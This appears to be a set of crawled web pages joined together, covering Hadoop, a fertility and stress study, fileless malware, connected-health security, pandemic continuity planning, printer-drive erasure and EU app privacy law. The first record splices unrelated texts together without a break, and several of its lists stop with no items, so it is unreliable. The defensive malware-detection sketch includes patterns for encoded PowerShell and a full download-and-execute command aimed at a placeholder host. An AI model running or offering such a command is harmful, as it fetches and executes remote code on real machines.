HBase is a scalable, distributed, NoSQL database that sits atop the HFDS. It was designed to store structured data in tables that could have billions of rows and millions of columns. It has been deployed to power historical searches through large data sets, especially when the desired data is contained within a large amount of unimportant or irrelevant data (also known as sparse data sets). It is also an underlying technology behind several large messaging applications, including Facebook’s.
HBase is not a relational database and wasn’t designed to support transactional and other real-time applications. It is accessible through a Java API and has ODBC and JDBC drivers. HBase does not support SQL queries, however there are several SQL support tools available from the Apache project and from software vendors. For example, Hive can be used to run SQL-like queries in HBase.
Oozie is the workflow scheduler that was developed as part of the Apache Hadoop project. It manages how workflows start and execute, and also controls the execution path. Oozie is a server-based Java web application that uses workflow definitions written in hPDL, which is an XML Process Definition Language similar to JBOSS JBPM jPDL. Oozie only supports specific workflow types, so other workload schedulers are commonly used instead of or in addition to Oozie in Hadoop environments.
Think of Sqoop as a front-end loader for big data. Sqoop is a command-line interface that facilitates moving bulk data from Hadoop into relational databases and other structured data stores. Using Sqoop replaces the need to develop scripts to export and import data. One common use case is to move data from an enterprise data warehouse to a Hadoop cluster for ETL processing. Performing ETL on the commodity Hadoop cluster is resource efficient, while Sqoop provides a practical transfer method.
Other Apache Hadoop-related open source projects
Here is how the Apache organization describes some of the other components in its Hadoop ecosystem.
- Ambari – A web-based tool for provisioning, managing, and monitoring Apache Hadoop clusters which includes support for Hadoop HDFS, Hadoop MapReduce, Hive, HCatalog, HBase, ZooKeeper, Oozie, Pig, and Sqoop.
- Avro – A data serialization system.
- Cassandra – A scalable multi-master database with no single points of failure.
- Chukwa – A data collection system for managing large distributed systems.
- Impala – The open source, native analytic database for Apache Hadoop. Impala is shipped by Cloudera, MapR, Oracle, and Amazon.
- Flume – A distributed, reliable, and available service for efficiently collecting, aggregating, and moving large amounts of streaming event data.
- Kafka – A messaging broker that is often used in place of traditional brokers in the Hadoop environment because it is designed for higher throughput and provides replication and greater fault tolerance.
- Mahout – A scalable machine learning and data mining library.
- Tajo – A robust big data relational and distributed data warehouse system for Apache Hadoop. Tajo is designed for low-latency and scalable ad-hoc queries, online aggregation, and ETL on large-data sets stored on HDFS and other data sources. By supporting SQL standards and leveraging advanced database techniques, Tajo allows direct control of distributed execution and data flow across a variety of query evaluation strategies and optimization opportunities.
- Tez – A generalized data-flow programming framework, built on Hadoop YARN, which provides a powerful and flexible engine to execute an arbitrary DAG of tasks to process data for both batch and interactive use-cases. Tez is being adopted by Hive, Pig and other frameworks in the Hadoop ecosystem, and also by other commercial software (e.g. ETL tools), to replace MapReduce as the underlying execution engine.
- ZooKeeper – A high-performance coordination service for distributed applications.
The ecosystem elements described above are all open source Apache Hadoop projects. There are numerous commercial solutions that use or support the open source Hadoop projects. Some of the more prominent ones are described in the following sections.
Commercial Hadoop distributions
Hadoop can be downloaded from www.hadoop.apache.org and used for free, which thousands of organizations have done. There are also commercial distributions that combine core Hadoop technology with additional features, functionality and documentation. The leading commercial distribution Hadoop vendors include Cloudera, Hortonworks, and MapR. There are also many more less comprehensive, more task-specific tools for the Hadoop environment, such as developer tools and job schedulers.
The study assessed allostatic load, which refers to the cumulative “wear and tear” of chronic stress and life events, in 444 women who were trying to become pregnant.
Women with higher allostatic load scores – based on nine indicators such as blood pressure, blood sugar, cortisol, noradrenaline, and cholesterol – were less likely to become pregnant within a year.
Allostatic load (AL) is a practical index that reflects multi-system physiological changes which occur in response to chronic psychosocial stress. This study investigated the association between female pre-pregnancy allostatic load and time to pregnancy.
For example, women with an allostatic load score of 5-6 had a 59% reduction in fecundability compared with those with scores of 0.
“What we found provides a new idea for preconception counseling. But obviously, how to objectively assess the stress is a complex scientific question, and how to intervene and reduce the impact of chronic stress is a burning problem, which are all things we need to study further,” said senior author Bei Wang, PhD, of Southeast University in Jiangsu, China.
Infertility affects around one in every six couples of reproductive age globally and more than 25 million inhabitants of the European Union (EU). The World Health Organization (WHO) acknowledges that despite the high frequency of infertility, the majority of infertile women remain silent about their experience, increasing their psychological fragility. Natural infertility may result in emotions of shame, remorse, and poor self-esteem.
These negative emotions might manifest as despair, worry, discomfort, and a low quality of life in varying degrees [2,3]. Other studies report infertility as causing depression comparable to cancer and other life-threatening diseases. On top of the negative psychological effects, infertility still causes stigmatization in couples that are unable to conceive, including pressure from families and peers, disturbing the quality of life and social position and causing serious relationship tension [5,6].
Existing research indicates that infertility has a greater impact on women than on men, with some women becoming victims of spousal abuse, economic distress, and social isolation. It was observed in Europe that couples seeking assisted reproductive therapy (ART) are more likely to have a higher socioeconomic status than the general population, since couples from this category often elect to have children later in life, after achieving career goals.
Options regarding infertility treatment vary nowadays by complexity, success rates, and, consequently, their costs. Assisted reproductive therapy (ART) in Romania has evolved extensively during the past two decades, offering a range of procedures, including in-vitro fertilization (IVF) and embryo transfer, intracytoplasmic sperm injection (ICSI), gamete intrafallopian transfer, zygote intrafallopian transfer, tubal embryo transfer, gamete and embryo cryopreservation, oocyte and embryo donation, and gestational surrogacy [10,11]. It is estimated that at least 8 million babies have been born through these assisted techniques since the first successful attempt, although the numbers in Romania remain unclear since most of them are performed in private practices.
Even though modern and expensive reproductive methods offer a statistically higher rate of success, several modifiable and unmodifiable factors are known to influence, or might influence, these numbers. While some lifestyle factors, such as cigarette smoking, illicit drug use, and alcohol and caffeine consumption, can be detrimental to female fertility, others, such as preventative care, can be favorable. Among the factors with the strongest impact on fertility described in the scientific literature are the patient's BMI, stress exposure, abnormal reproductive organ anatomy, and delayed childbearing age, the latter two being unmodifiable [13,14].
Women experiencing infertility overwhelmingly believe that stress plays a role in their failure to conceive, and those who seek ART are particularly worried that stress may lower their chances of getting pregnant [16,17]. Multiple mechanisms by which stress exposure and depression may influence female fertility have been suggested; however, population studies on fertility with this main goal are scarce.
This has resulted in imprecise conclusions about the effect of depression on infertility [4,19], although several published studies have indicated that infertile women receiving fertility treatment experience higher levels of stress and a higher prevalence of depression and anxiety than the general population [20,21]. Additionally, these symptoms are more prevalent in individuals who have had many IVF rounds after unsuccessful efforts [22,23].
In light of the aforementioned information, we sought to address the stress and financial factors that are most prevalent in Romania and that represent a likely reason for impeding infertile couples' access to assisted reproductive treatment in our country.
Original Research: Open access.
“Female fecundability is associated with pre-pregnancy allostatic load” by Bei Wang et al., Acta Obstetricia et Gynecologica Scandinavica
Fileless malware uses a computer system’s built-in tools to execute a cyberattack. In other words, fileless malware takes advantage of the vulnerabilities present in installed software to facilitate an attack. This type of malware does not require the attacker to sneak malicious code onto a potential victim’s system’s hard drive to be successful. Therefore, fileless malware can be extremely hard to detect—and extremely dangerous.
This blog will outline the basics of what fileless malware is along with the stages of an attack, the common techniques used by cybercriminals employing fileless malware, and tips for detecting these types of threats.
Fileless malware is a threat that doesn’t exist on disk. Typically, when malware is on disk—what I mean by on disk is malware loaded onto a machine’s SSD (solid state drive) or hard drive—it physically exists and is much easier for security software to detect. It can also be examined by security researchers, especially if it’s a complex threat.
Obviously, attackers don’t want their malware to be analyzed by defenders, who would then be better able to defend by reverse engineering the malware. So, the best way for the bad guys to keep their fileless malware effective and not have it analyzed is to make sure it’s not on disk. Hence, the rise of fileless malware.
Naturally, your next question about fileless malware is “Where in the world does it exist if it’s not on disk?” Basically, it exists in memory. Over the years, sophisticated attackers have used a variety of techniques to inject memory with their vilest malware.
Frodo and The Dark Avenger are early examples of fileless malware. Frodo was created in 1989 and was initially meant to be “a harmless prank.” Eventually, it was exploited. That same year, The Dark Avenger was also discovered. It was used to infect executable files every time they were run on an infected computer. Even the copied files would get infected.
Today, fileless malware has become so advanced that the code it injects into memory executes and downloads new code in memory. Fileless malware does not require files to launch; however, it does need to modify the native environment and tools that it tries to attack. This is a much more advanced way of using fileless malware.
Using this technique makes it very difficult for security software to figure out what the fileless malware is executing, because there are so many things happening in memory—so many normal operations being run—that it’s complex and hard to examine and get a handle on what’s happening. Security solutions simply can’t get a baseline on whether something malicious is occurring or not. This is what makes fileless malware so effective.
We are seeing more fileless malware than in the recent past, but one of the downsides for attackers is that it is more complicated than traditional malware. To create and execute fileless malware, attackers require a higher level of skill. This is why, when you do see fileless malware attacks, they are typically associated with state-sponsored threats or the most sophisticated cybercriminals.
To get the same capabilities and features that traditional malware has, fileless malware requires creators with strong skill sets. The challenge for them is that there's limited space in a device's memory and they don't have much disk space to work with. The malware in memory can only reside in an existing memory space that's already limited in functionality.
Fileless malware is not only difficult to execute, but attackers must also find a place in memory for it. And it must work quickly, because fileless malware is flushed from memory when the system is rebooted. To be effective, fileless malware attackers need the right set of circumstances.
Like a traditional malware attack, the typical stages of a fileless malware attack are:
Cybercriminals that use fileless malware need to access the system in order to modify the native tools and launch attacks. Currently, stolen credentials are still the most common technique that attackers use to gain access.
Anytime you hear about credentials being stolen or usernames being hacked or credit card information being lifted, I wouldn't be surprised if there's at least some component of fileless malware involved.
Once fileless malware has gained access to a system, it can begin launching traditional malware. The techniques listed below tend to be more successful when combined with fileless malware:
The best way to detect and defeat fileless malware attacks is to have a holistic approach with a multi-layered defense posture. An organization’s best practices for detecting fileless malware threats should include employing indicators of attack (IOAs) along with indicators of compromise (IOCs) and leveraging their security solution’s threat hunting capabilities.
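As a toy illustration of string-level indicators, the sketch below flags process command lines that match patterns often associated with fileless techniques (encoded or download-and-execute PowerShell). The patterns are illustrative assumptions, not an authoritative IOA list; a real detection engine correlates behavior across processes, memory, and the network rather than matching strings.

```python
import re

# Illustrative patterns only; not an exhaustive or authoritative IOA list.
SUSPICIOUS_PATTERNS = [
    re.compile(r"-enc(odedcommand)?\b", re.IGNORECASE),  # encoded PowerShell
    re.compile(r"downloadstring", re.IGNORECASE),        # download-and-run
    re.compile(r"frombase64string", re.IGNORECASE),      # in-memory decode
    re.compile(r"\biex\b", re.IGNORECASE),               # Invoke-Expression alias
]

def flag_suspicious(cmdlines):
    """Return the command lines that match any indicator pattern."""
    return [c for c in cmdlines
            if any(p.search(c) for p in SUSPICIOUS_PATTERNS)]

sample = [
    "powershell.exe -NoProfile -EncodedCommand SQBFAFgA...",
    "notepad.exe C:\\notes.txt",
    "powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://x/p.ps1')",
]
print(flag_suspicious(sample))  # flags the two PowerShell invocations
```

In practice such string checks would be one weak signal among many, combined with memory and behavioral telemetry before raising an alert.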
Because fileless malware uses a system’s built-in tools to facilitate attacks and cover its tracks, cybersecurity teams must be aware, remain vigilant, and know the different methods attackers employ in carrying out these fileless malware attacks. It’s all about gaining visibility on cybercriminals that are trying hard to hide in a system’s memory. | <urn:uuid:4cc5acf8-376f-4ca6-93c8-3ce81338cd12> | CC-MAIN-2022-40 | https://www.fortinet.com/blog/industry-trends/fileless-malware-what-it-is-and-how-it-works | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00366.warc.gz | en | 0.943216 | 1,092 | 2.890625 | 3 |
If your enterprise is considering Hadoop to help handle your big data workload, you’re in good company. Many organizations are exploring the use of this software to manage large amounts of data and more complex queries.
Hadoop has grown in popularity as big data has spurred the evolution of platforms capable of handling its large demands. Tools have evolved from simple tool sets to complete platforms. Large systems integrators and tech titans such as IBM have embraced the open source movement, making it more available and accessible to customers who are choosing how to implement big data for their enterprises.
Benefits of Using Hadoop
A few of the benefits of using Hadoop in your project include:
Traditionally, IT was completely responsible for all development. And if the business didn’t communicate its needs clearly to IT, or IT didn’t listen carefully, what they developed was not always what the business really needed or wanted. But with Hadoop, businesspeople – those who truly understand what their goals are and how the data can be used – are becoming far more involved in the process.
Because the big data platform capabilities are expanding, the emphasis on programming has decreased. As applications become more automated, less technical skill is needed to use them. The process is mirroring what happened with data warehousing and business intelligence (BI), where coding knowledge was necessary at first, but then vendors developed data integration and BI tools, which were much simpler and intuitive to use.
Frequently, the businesspeople tasked with working with Hadoop are called data scientists. This is an often-misunderstood job title. Some perceive that the data scientist is a coder, but in fact, it is someone whose main focus is the business. This is someone who really understands the business, its goals and what it needs to do with its data.
In the past, working with tools meant working with code. But now, the expertise data scientists must have is more in the area of developing predictive models and econometrics. The data models may have over 1,000 variables, so being able to predict customer behavior is more important than programming. In fact, for this role, a psychology major is going to have a better background than a computer science major.
The role of the business analyst is shifting as well. While the role used to require knowledge such as developing statistical programs, business analysts can now use data visualization and data discovery tools to interpret and make decisions based on their data.
The Data Difference
One of the problems in a big data initiative happens when people don’t understand that there is a variety of data and many different ways to manage that data – one size does not fit all.
Previously, people thought that data warehouses (DW) and relational databases could handle all of their needs. But then we started seeing unstructured data (like the content of emails and tweets), which didn’t fit in well with the structure or lend itself to a SQL query, no matter how complex. Now, people are deciding that everything needs to go into a Hadoop platform (or Hive or another comparable platform). The reality, however, is that data comes in all shapes and sizes. Some you need in real time, some you can wait for. Think of data in terms of the three Vs: volume, variety and velocity. With this in mind, you can see that some data belongs in traditional databases, while other data is better suited to Hadoop platforms.
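As a conceptual illustration of why free-form text suits the processing model Hadoop popularized, here is the MapReduce pattern in plain Python. This is a sketch of the idea only; a real Hadoop job would run these two phases distributed across a cluster.

```python
from collections import defaultdict

def map_phase(lines):
    """Map: emit a (word, 1) pair for every word in every record."""
    for line in lines:
        for word in line.split():
            yield word.lower(), 1

def reduce_phase(pairs):
    """Reduce: sum the values emitted for each key."""
    counts = defaultdict(int)
    for word, n in pairs:
        counts[word] += n
    return dict(counts)

# Unstructured records (e.g. tweets) that don't fit a relational schema
tweets = ["big data needs big tools", "data comes in all shapes"]
print(reduce_phase(map_phase(tweets)))  # 'big' and 'data' each counted twice
```

The same word count against a relational table would first require forcing the free text into rows and columns, which is exactly the mismatch the paragraph above describes.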
It is not uncommon for an organization to forget the lessons of the past and repeat its sins. This is evident in regard to two lessons forgotten in initial big data efforts. First, when organizations use new data technologies they tend to make the mistake of building a new data silo because it seems to be the easiest way to get things done quickly. But data silos will hinder an organization’s ability to examine data from a variety of sources, which then makes getting long-term business value from a big data initiative even more elusive.
Second, during the initial DW wave, organizations kept trying to design data capture systems, e.g., enterprise applications, the same way they designed the DW for analytical purposes. It became best practice to design data structures differently for data capture and data analysis. Many big data initiatives are revisiting the past and trying to combine capture and analytical design – resulting in costly misuse of the new big data technologies.
Your Big Data Plan
When big data is part of your plan, remember three things: | <urn:uuid:36035d89-7645-49f8-95fa-cc68a1ab54ab> | CC-MAIN-2022-40 | https://athena-solutions.com/considerations-for-implementing-hadoop-for-your-big-data-project/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00366.warc.gz | en | 0.960213 | 927 | 2.578125 | 3 |
Investing in cyber security of connected health
Connected Health is a rapidly growing area with huge innovative possibilities and potential. This is mostly due to the uptake of digital technologies in the health and medical fields that support diagnosis, treatment and management of health conditions.
It is however crucially important that security of Connected Health products, systems and services is baked in by design. The health context also demands its own consideration of security risks and implications. Security research in Connected Health also needs to be done responsibly - fear mongering in this space could reduce public trust and uptake of potentially lifesaving and life-changing technologies.
Generally, existing security research in the connected health industry seems to be focused on three key areas: implantable medical devices, security of equipment and networks in hospitals and methods by which implantable devices can be defended while still remaining accessible to medical staff in an emergency. Connected Health however is a much broader and varied topic, with many potentially interesting application areas such as personal health care through connected devices, age-related health care and mental health.
Although purely technical solutions are of vital importance in Connected Health security, enforcing secure solutions or making security a priority will be difficult without agreed standards throughout the industry and government legislation.
In our whitepaper we explore the Connected Health landscape, and present the security challenges and considerations required to deliver a Connected Health ecosystem that works for all in a secure and safe way. | <urn:uuid:ccd2217e-0422-4017-beba-b55e7137f944> | CC-MAIN-2022-40 | https://newsroom.nccgroup.com/news/investing-in-cyber-security-of-connected-health-388019 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030336978.73/warc/CC-MAIN-20221001230322-20221002020322-00366.warc.gz | en | 0.965744 | 292 | 2.546875 | 3 |
Pandemic Disaster and Business Continuity Planning
A pandemic is an epidemic (a sudden outbreak) that becomes very widespread and affects a whole region, a continent, or the world. By contrast:
- An epidemic involves more than the expected number of cases of a disease occurring in a community or region during a given period of time: a sudden, severe outbreak within a region or a group, as, for example, AIDS in Africa or AIDS among intravenous drug users.
- An endemic disease is present in a community at all times but at low frequency. An endemic is continuous, as in the case of malaria in some areas of the world or illicit drug use in some neighborhoods.
In disaster planning, when a pandemic occurs, the data center still exists but people will be in separate locations. The Disaster Planning and Business Continuity Planning processes need to make the user and business operating experience as similar as possible, so that the work environment in the remote site (often home) is the same as in the office. A key requirement is to increase remote access capabilities. In addition, before a pandemic occurs, the following planning needs to take place:
- Define necessary staff levels for critical business processes
- Identify who can work remotely and who has to be in the office
- Validation of vaccinations for key staff members
- Identify the lights out processing issues for computer operations staff
- Identify the network and remote access capacity requirements - what percent of workers do you need to be on the system for the enterprise to continue to operate
- Train and test users and IT staff in how to operate from remote locations
- Require key employees to work from remote site at least once a month
- Validate broadband capacity to remote sites (home users)
- Have copies of disaster plan available in remote site
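The capacity item above ("what percent of workers do you need to be on the system") reduces to simple arithmetic. A minimal sketch follows; the figures are illustrative assumptions, not recommendations.

```python
def required_vpn_sessions(total_staff, remote_fraction, peak_concurrency):
    """Concurrent remote-access sessions to provision for.

    remote_fraction: share of staff who must work remotely
    peak_concurrency: share of those workers online at the same time
    """
    return int(round(total_staff * remote_fraction * peak_concurrency))

# 500 employees, 60% working remotely, 80% online at the daily peak
print(required_vpn_sessions(500, 0.60, 0.80))  # → 240 sessions
```

The monthly work-from-home tests recommended above are a good opportunity to validate that the provisioned figure actually holds under load.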
Put in place a process for synchronizing OS patches and VPN updates. If the workstations are not used frequently, disable the auto-update features for security updates but maintain a process to see that the workstations are up to date.
Define specific requirements for security and PCI-DSS when the disaster plan is activated for a pandemic.
Define change management and version control processes to be used and how they will be controlled during the pandemic.
Once the disaster plan has been activated for a pandemic, a central source of information on who is infected, immune, or unavailable needs to be developed and maintained accurately. In addition, staff members who are working in the office and data center environments should be isolated if at all possible so they do not become infected. This may require a quarantine of these employees, based on the severity of the pandemic.
Users Demand 24 x 7 Availability
Users demand 24 x 7 IT service availability via web sites, portals, email, and mission critical applications. When these systems and applications are not there or are operating in a degraded mode, it negatively impacts the reputation and revenue of an enterprise. Maintaining availability and preventing downtime begins with the successful deployment of network and system management solutions that are focused on IT Service Management in a Service-Oriented architecture.
When managing the help/service desk in an IT Service Management environment (ITSM) with Service-Oriented Architecture (SOA), there are five (5) things that you need to do. They are:
- Validate that you have implemented service tools rather than adding unnecessary overhead and bureaucracy. Evaluate your policies, procedures, and processes from the user perspective. To be a service desk, you must serve your clients rather than make them change what they do to meet your needs.
- Survey your users often and understand what they do not like. Review the comments and listen to critics with an eye toward improving what you are doing. When a change is implemented, go back to the critics and see if you have improved.
- Implement metrics and track performance over time. Use metrics that apply to your users and see what the trends are over time. In addition, use the same metrics to see how your competition is doing. Determine if you are providing world-class service or just average service.
- Determine the cost of a service solution and its ROI before you implement it, and measure achievement. Be professional in implementing changes to your help/service desk. If you are constantly changing the process, you will not know if your changes are having the right impact.
- Encourage input from your users. Listen to your users and validate that the problem you are solving is the one they want solved. Tell them what you heard them say and what your action steps will be. After you implement the solution, confirm with them what you did and how it worked.
Written By Pravin Mehta
Updated on July 22, 2022
Commercial printers such as an enterprise or workgroup-class printer, typically installed in large offices and connected over a local area network, are used for printing large volumes of data in a multi-user environment. These commercial printers comprise a dedicated (removable) hard drive to store the scanned images, PDFs, and other types of documents for printing. A non-volatile memory such as traditional platter-based storage (HDD) or flash storage (SSD) allows these workgroup-class network printers to copy the documents without spooling them.
Multi-function Printer or MFP is another category of printers for performing multiple tasks such as printing, scanning, fax, and email. MFPs serve a utility similar to the workgroup-class printer, at a lower volume, so they might also have a dedicated hard drive for data storage. Ricoh, HP, Epson, Dell, Brother, Canon, Xerox, and Lexmark are some of the leading manufacturers of commercial printers and MFPs.
A basic understanding of the printer hard drive's data storage mechanism is necessary to comprehend the potential data vulnerabilities associated with such printers. In layman's terms, the printer hard drive keeps storing and queuing the printing tasks in a circular buffer, i.e., sequential units of memory used in a circular order, without deleting the previous tasks. It starts overwriting the previous tasks only after the memory fills up.
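The circular-buffer behavior described above can be modeled in a short sketch. This is a deliberately simplified model for illustration, not actual printer firmware.

```python
class CircularBuffer:
    """Toy model of a print spool: slots are reused in circular order,
    so old jobs persist on the drive until their slot is overwritten."""

    def __init__(self, size):
        self.slots = [None] * size
        self.next = 0

    def store(self, job):
        self.slots[self.next] = job
        self.next = (self.next + 1) % len(self.slots)

    def residual_jobs(self):
        # Jobs still recoverable from the "drive" at this moment
        return [j for j in self.slots if j is not None]

buf = CircularBuffer(3)
for job in ["payroll.pdf", "contract.pdf", "scan001.tif", "memo.txt"]:
    buf.store(job)

# Only the oldest job has been overwritten; the rest persist.
print(buf.residual_jobs())
```

With a 3-slot buffer and 4 stored jobs, only the first job has been overwritten; everything else remains readable, which is why data can linger for days or weeks on a lightly used printer.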
This fact means the data stored in a printer hard drive can persist in the media for days and even weeks. This data comprising print jobs, fax, copy, scan, address book, etc. is vulnerable to a cybersecurity breach or leakage due to improper disposal of the equipment. The following section outlines the threat actors:
The following are the two main data breach & leakage scenarios concerning the printers with hard drives:
Commercial printers serve multiple users on the organization’s local network, also connected to the Internet. This “network” is often the doorway for hackers to eavesdrop, who can also hijack the printer and other client machines in the network.
Imagine this scenario: the HR department in an organization stores the employee onboarding forms on the printer hard drive to allow remote populating and printing of the forms. These forms continue gathering personal data of the users until the hard drive is “flushed”. Meanwhile, an HR person receives a few resumes as email attachments with malicious code that triggers only in the printer OS environment.
This malicious code sneaks past the malware program on the client machine and gets installed on the printer hard drive. The malware now eavesdrops all the connected nodes on the network and steals the sensitive documents stored in the printer without detection, leading to a data breach incident – detected & reported way down in the future.
This situation sounds scary, but it is possible and accounts for a big chunk of print-related data breach incidents. As per the Global Print Security Landscape, 2019 report by Quocirca, 60% of businesses in the UK, the US, France, and Germany suffered a print-related data breach in 2018, incurring losses to the tune of USD 400,000. Aside from reinforcing upfront protection against hacking or malware through firewalls and system upgrades, you could also consider setting up a deliberate and routine practice for permanent removal of unwanted data from the printer hard drive. You can explore the printer’s built-in function for clearing the data or use a data erasure tool for systematic & permanent wiping. Read the following sections on the concept of media sanitization and data erasure technology for wiping the printer hard drive clean.
Printer data leakage may also happen due to “improper sanitization” of the hard drive when transferring the printer’s custody, as we explain next. There are several “exit points” in the printer’s lifecycle or any other electronic hardware, including computers, when the artifact changes the custody (ownership). This change of device ownership necessitates deliberate media sanitization to avoid exposure of the sensitive or confidential data stored on the device.
Media sanitization means systematic destruction of the data stored on a media such that it becomes unrecoverable using any tool or technique. Formal media sanitization methods focus on safeguarding the redundant data against the risks of exposure, misuse, and even penal actions.
For example, a commercial printer acquired on a lease may accumulate a large amount of sensitive data in the hard drive. The user or custodian organization is at immediate risk of data leakage if it fails to sanitize the printer hard drive before returning the printer. Another data leakage situation may crop up due to the disposing of an old printer without sanitizing it. For example, selling a used printer to the highest bidding vendor, donating it for charity, exchanging the device, or discarding the hardware for recycling are a few exit scenarios that can risk exposure of the sensitive data. Anybody in possession of the printer can extract (steal) the data from the hard drive, exposing the sensitive documents, faxes, copies, and print jobs.
There are several different media sanitization technologies in mainstream usage, widely categorized as Shredding, Degaussing, and Erasure. Shredding involves physical destruction of the hardware into smaller pieces such that the storage media is rendered unusable to prevent data retrieval. Shredding turns the hardware into toxic e-waste with no residual value for reuse or resale. Further, shredding is typically done off-site due to financial and logistic constraints, so the threat of data leakage remains looming while the printer hard drive is in transit to the shredding facility and until shredded.
Degaussing destroys the data by demagnetizing magnetic storage media such as a hard disk drive. The technique turns the storage hardware inoperative, as the magnetic field is neutralized and, therefore, the media can no longer store data. Degaussing is an ineffective method for sanitizing emerging magnetic storage media and flash memory-based storage devices. As per the NIST SP 800-88 Guideline, “existing degaussers may not have sufficient force to degauss evolving magnetic storage media and should never be solely relied upon for flash memory-based storage devices or magnetic storage devices that contain non-volatile non-magnetic storage”. Degaussing, like shredding, results in e-waste generation, and it also doesn’t work on flash storage media such as solid-state drives.
Data Erasure (also known as data wiping) involves overwriting the existing data with unique binary patterns to mutilate and desensitize it. The data erasure technique turns the overwritten data illegible to any kind of read or extract tools or techniques without affecting the storage media (hardware). The erased media can be reused or monetized through resale and therefore retains its life stage value, like a PC can be reused after fresh OS installation. The data erasure technique can sanitize hard disk drive, solid-state drive, and any other media in an operable state, and it does not generate any e-waste.
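The overwrite principle can be demonstrated on an ordinary file. This sketch is conceptual only: real media sanitization must target the whole device with a certified tool, since filesystems and SSD wear-leveling can leave copies that a file-level overwrite never reaches.

```python
import os
import tempfile

def overwrite_file(path, passes=(b"\x00", b"\xff", b"\xaa")):
    """Overwrite a file in place with successive byte patterns."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for pattern in passes:
            f.seek(0)
            f.write(pattern * size)
            f.flush()
            os.fsync(f.fileno())  # push each pass to stable storage

# Create a throwaway file standing in for a sensitive document
with tempfile.NamedTemporaryFile(delete=False) as tmp:
    tmp.write(b"confidential print job")
path = tmp.name

overwrite_file(path)
with open(path, "rb") as f:
    print(f.read()[:8])  # the original bytes are gone
```

Multi-pass schemes such as DoD 5220.22-M formalize exactly this idea, specifying the number of passes and the patterns written on each one.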
Therefore, data erasure or wiping makes the best choice for printers having a dedicated hard drive, mainly including the enterprise or workgroup-class devices and MFPs.
The good news is that there are professional data erasure software tools that can provide an easy (DIY), efficient, and compliant method for wiping the hard drives and SSDs used inside a printer. These software tools can permanently erase the hard drive, as per the prevalent data erasure standards, and ensure that no data recovery tool or technique can recover the wiped data. Professional data erasure software also provides documented proof to attest to the wiping process and its efficacy to fulfill the global regulatory norms for data protection.
For example, you can try BitRaser Drive Eraser, a commercial data wiping software designed for erasing the hard drives and SSDs used in printers, laptops or desktops, workstation computers, servers, etc. It permanently wipes the storage media based on international standards such as NIST 800-88 and DoD 3 & 7 passes. It generates tamper-proof certificates and reports of erasure to serve the regulatory mandates.
Please read our detailed & easy-to-understand software KB on how to erase your printer’s removable hard drive using BitRaser Drive Eraser. The software can start erasing the hard drive in about 10 minutes, thereby protecting your data against risks of breach and leakage.
BitRaser is NIST Certified
- US Department of Defense, DoD 5220.22-M (3 passes)
- US Department of Defense, DoD 5200.22-M (ECE) (7 passes)
- US Department of Defense, DoD 5200.28-STD (7 passes)
- Russian Standard – GOST-R-50739-95 (2 passes)
- B. Schneier's algorithm (7 passes)
- German Standard VSITR (7 passes)
- Peter Gutmann (35 passes)
- US Army AR 380-19 (3 passes)
- North Atlantic Treaty Organization – NATO Standard (7 passes)
- US Air Force AFSSI 5020 (3 passes)
- Pfitzner algorithm (33 passes)
- Canadian RCMP TSSIT OPS-II (4 passes)
- British HMG IS5 (3 passes)
- Pseudo-random & Zeroes (2 passes)
- Random Random Zero (6 passes)
- British HMG IS5 Baseline standard
- NAVSO P-5239-26 (3 passes)
- NCSG-TG-025 (3 passes)
- 5 Customized Algorithms & more
Update: Find out more about the EU's General Data Protection Regulation here. In this blog series, we will shed light on the legislative framework of mobile application development in major countries and regions across the globe. The second part of the series is an analysis of EU regulations that are of concern to application developers.
Privacy is an important matter in European law. As early as 1995, the EU adopted the Data Protection Directive (Directive 95/46/EC) to regulate the collection and processing of personal data, such as location, contacts, identity, pictures and browsing history. Organisations aren’t allowed to process personal data unless three conditions are met. Firstly, the user of a service has the right to be informed when his personal information is being processed, and the controller must disclose who the recipients of the data are. Secondly, personal data can only be processed for explicitly specified and legitimate purposes and only insofar as it is relevant and not excessive in relation to these purposes. Thirdly, the data must be accurate and, if necessary, kept up to date. Extra restrictions apply when sensitive personal data is being processed, such as religious beliefs, political opinions, health or sexual orientation. Since an EU directive has to be transposed into national law in order to have effect, all member states have enacted their own data protection legislation.
The Data Protection Directive also established the Working Party (Article 29), an independent European advisory body on data protection and privacy to promote the uniform application of the general principles of the directive in all member states. In 2013, it issued an opinion on mobile applications to address the risks that go with them. Moreover, the opinion contains some guidelines for app developers in order to tackle the insufficient protection of the personal data they process.
The E-Privacy Directive (2002/58), issued in 2002 to address the challenges of the emerging digital technologies, applies to all matters that weren’t specifically covered by the Data Protection Directive. It sets a specific standard for all parties worldwide that wish to access information stored in the devices of users in the European Economic Area (EEA). First, the Directive states that gaining access to or storing information (any type, not just personal data) is only allowed when the consumer has given consent. Furthermore, consumer consent is also needed for the installation of an application. Last, organisations are obliged to notify the Supervisory Authority as soon as they become aware of the data breach.
In 2012, the European Commission proposed to replace the Data Protection Directive with the General Data Protection Regulation, which applies automatically to anyone processing the data of EU citizens. One of the new measures requires mobile app developers to obtain parental consent for processing data of children younger than 13. Another measure allows data protection authorities to impose a penalty of up to 2% of a company’s worldwide turnover in case of violation of the law. After four years of amending the draft, the member states reached an agreement in December 2015. It is expected that the regulation will be formally adopted in the spring of 2016 and come into effect in 2018.
Also noteworthy is the EU-US Privacy Shield, a new framework for transatlantic data flows signed at the start of 2016. When it comes into effect, the new arrangement will place stronger obligations on companies in the US to protect the personal data of Europeans, along with stronger monitoring and enforcement by the US Department of Commerce and Federal Trade Commission (FTC). The US government has given the European Union the assurance that access by public authorities for law enforcement and national security will be subject to clear limitations and strong oversight.
Similar to Canada and the US, the EU has adopted additional laws concerning the processing of medical data. Medical devices are regulated under the Medical Devices Directive (93/42/EEC) and the In Vitro Diagnostic Medical Devices Directive (98/79/EC; in vitro devices are used in the examination of samples taken from the human body, like blood and urine). Mobile medical applications (or mHealth applications) fall under the Directives if they have an intended “medical purpose”. The European Commission acknowledged the uncertainty of this criterion, and therefore published guidelines on the qualification and classification of medical software in 2012. In the same year, the Commission proposed revisions of the two Medical Device Directives in order to improve the safety level of medical devices. Since then, the proposal has become a ‘bureaucratic Frankenstein’ with many deviations from the original text, similar to the process of drafting the European Data Protection Regulation. The implementation of the new regulations is expected in 2016.
